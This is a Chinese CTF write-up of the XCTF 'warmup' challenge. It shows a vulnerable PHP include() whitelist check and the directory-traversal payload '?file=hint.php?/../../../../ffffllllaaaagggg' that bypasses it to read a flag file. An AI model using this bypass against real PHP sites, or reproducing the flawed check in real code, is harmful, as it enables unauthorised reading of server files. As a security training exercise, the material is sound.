目录穿越_warmup

warmup 攻防世界

#题目
 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

题解

首先需要传入一个file变量，要求file是字符串并且满足checkFile()函数

checkFile()的过滤：
1.page是字符串

​ 2.page在whitelist数组中

​ 3.page从开始到第一个?之间在whitelist中

​ 4.url解码后从开始到第一个?之间在whitelist中

进入到hint.php文件中，提示flag在ffffllllaaaagggg中

所以构造payload:

?file=hint.php?/../ffffllllaaaagggg

发现什么也没有，一次增加../进行尝试，最终payload：

?file=hint.php?/../../../../ffffllllaaaagggg

---

php对本地文件路径的解析规则

1.include的参数中包含?时，PHP会默认将?视为特殊字符，然后优先尝试将?前的字符串作为路径，然后尝试将?后面的内容当做相对路径进行拼接：

无法识别 ?，会默认忽略它的存在，相当于把 hint.php?../xxx 当作 hint.php/../xxx 来处理

2.../是文件系统中“向上级目录导航”的意思